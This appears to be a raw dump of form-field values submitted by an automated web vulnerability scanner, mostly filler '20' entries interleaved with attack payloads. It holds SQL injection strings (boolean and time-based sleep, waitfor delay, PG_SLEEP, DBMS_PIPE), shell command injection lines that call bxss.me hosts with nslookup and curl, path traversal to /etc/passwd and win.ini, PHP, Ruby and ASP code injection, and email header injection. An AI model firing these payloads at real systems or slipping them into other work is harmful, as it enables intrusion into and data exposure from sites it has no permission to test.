20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1BeeRTfcgAO
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
${9999035+9999267}
20
20
819ZBBOX
20
20
20
20
20&n962607=v923481
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'.gethostbyname(lc('hitgc'.'lskfymcm936df.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(79).chr(114).chr(89).'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
".gethostbyname(lc("hitol"."hklzgvzz968ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(65).chr(117).chr(78)."
20
20
20
20
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
20
20
20
20
20
20
20
20
20
20
20
20
20
20
xfs.bxss.me
20%0abcc:074625.142431-33123.142431.07b7e.19585.2@bxss.me
20
20
20
response.write(9290304*9720665)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
20
20
20
HttP://bxss.me/t/xss.html?%00
to@example.com>%0d%0abcc:074625.142431-33124.142431.07b7e.19585.2@bxss.me
20
'+response.write(9290304*9720665)+'
20
20
20
20
20
20
bxss.me/t/xss.html?%00
"+response.write(9290304*9720665)+"
20
20
)
20
20
20
20
20
20
"+"A".concat(70-3).concat(22*4).concat(103).concat(83).concat(119).concat(87)+(require"socket"
Socket.gethostbyname("hityr"+"tbxodfflce51d.bxss.me.")[3].to_s)+"
20
20
20
20
20
20
20
20
!(()&&!|*|*|
'+'A'.concat(70-3).concat(22*4).concat(122).concat(79).concat(122).concat(85)+(require'socket'
Socket.gethostbyname('hitbs'+'xlrippix2771c.bxss.me.')[3].to_s)+'
20
20
20
20
20
20
^(#$!@#$)(()))******
20
../../../../../../../../../../../../../../etc/passwd
20
20
20
20
20
20
20
../../../../../../../../../../../../../../windows/win.ini
20
20
file:///etc/passwd
20
20
20
20
20
20
20
20
20
'"
20
20
../20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'"()
20
20
20
20
20
20'&&sleep(27*1000)*jiygol&&'
20
20
20
20
20"&&sleep(27*1000)*apqajl&&"
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
20'||sleep(27*1000)*falycl||'
20
20
20
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
20"||sleep(27*1000)*pvmqwa||"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
20
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
';print(md5(31337));$a='
20
20
20
20
";print(md5(31337));$a="
20
/etc/shells
20
20
echo cjpawc$()\ hyfcmu\nz^xyu||a #' &echo cjpawc$()\ hyfcmu\nz^xyu||a #|" &echo cjpawc$()\ hyfcmu\nz^xyu||a #
20
${@print(md5(31337))}
c:/windows/win.ini
20
&echo gfzxrn$()\ dqzosq\nz^xyu||a #' &echo gfzxrn$()\ dqzosq\nz^xyu||a #|" &echo gfzxrn$()\ dqzosq\nz^xyu||a #
20
|echo jowbfx$()\ ndhdkd\nz^xyu||a #' |echo jowbfx$()\ ndhdkd\nz^xyu||a #|" |echo jowbfx$()\ ndhdkd\nz^xyu||a #
bxss.me
${@print(md5(31337))}\
20
20
20
(nslookup -q=cname hitqkgrvcsyvkdf57b.bxss.me||curl hitqkgrvcsyvkdf57b.bxss.me))
'.print(md5(31337)).'
20
$(nslookup -q=cname hitfxjimpokteabccb.bxss.me||curl hitfxjimpokteabccb.bxss.me)
20
20
&nslookup -q=cname hitpfcrcfvdardd141.bxss.me&'\"`0&nslookup -q=cname hitpfcrcfvdardd141.bxss.me&`'
&(nslookup -q=cname hitwggjzhuuvw40ac5.bxss.me||curl hitwggjzhuuvw40ac5.bxss.me)&'\"`0&(nslookup -q=cname hitwggjzhuuvw40ac5.bxss.me||curl hitwggjzhuuvw40ac5.bxss.me)&`'
20
|(nslookup -q=cname hitpmcbomuplh395ea.bxss.me||curl hitpmcbomuplh395ea.bxss.me)
20
`(nslookup -q=cname hitwozgmzhuaxb3b9a.bxss.me||curl hitwozgmzhuaxb3b9a.bxss.me)`
20
20
;(nslookup -q=cname hitbszlxrvvmlc3d5c.bxss.me||curl hitbszlxrvvmlc3d5c.bxss.me)|(nslookup -q=cname hitbszlxrvvmlc3d5c.bxss.me||curl hitbszlxrvvmlc3d5c.bxss.me)&(nslookup -q=cname hitbszlxrvvmlc3d5c.bxss.me||curl hitbszlxrvvmlc3d5c.bxss.me)
20
20
20
20
20
20
20
20'"()&%k6eb(9000)
20
20
20
'"()&%k6eb(9550)
20
20
209165010
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1Lype1Ok
-1 OR 2+996-996-1=0+0+0+1 --
-1 OR 2+464-464-1=0+0+0+1
-1' OR 2+92-92-1=0+0+0+1 --
-1' OR 2+962-962-1=0+0+0+1 or '9kERK8o3'='
-1" OR 2+218-218-1=0+0+0+1 --
1'"
1????%2527%2522
@@HkZeK
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
eU5DGEXU
-1 OR 2+884-884-1=0+0+0+1 --
-1 OR 2+165-165-1=0+0+0+1
-1' OR 2+194-194-1=0+0+0+1 --
-1' OR 2+439-439-1=0+0+0+1 or 'Y9h2glck'='
-1" OR 2+874-874-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
CYjPmiZ1'; waitfor delay '0:0:15' --
-5 OR 819=(SELECT 819 FROM PG_SLEEP(15))--
-5) OR 747=(SELECT 747 FROM PG_SLEEP(15))--
-1)) OR 903=(SELECT 903 FROM PG_SLEEP(15))--
k0WO5Cdy' OR 731=(SELECT 731 FROM PG_SLEEP(15))--
0BTndtMH') OR 524=(SELECT 524 FROM PG_SLEEP(15))--
sckpOd0G')) OR 60=(SELECT 60 FROM PG_SLEEP(15))--
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1????%2527%2522
@@CfALH
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1
1
EC115dF3
-1 OR 2+829-829-1=0+0+0+1 --
-1 OR 2+636-636-1=0+0+0+1
-1' OR 2+555-555-1=0+0+0+1 --
-1' OR 2+353-353-1=0+0+0+1 or '8TAouexd'='
-1" OR 2+81-81-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
9YKb9JvN'; waitfor delay '0:0:15' --
-5 OR 537=(SELECT 537 FROM PG_SLEEP(15))--
-5) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
-1)) OR 986=(SELECT 986 FROM PG_SLEEP(15))--
otZxI0yu' OR 976=(SELECT 976 FROM PG_SLEEP(15))--
M5PxGfSH') OR 328=(SELECT 328 FROM PG_SLEEP(15))--
Bo6X0zvo')) OR 382=(SELECT 382 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1????%2527%2522
@@xg4hu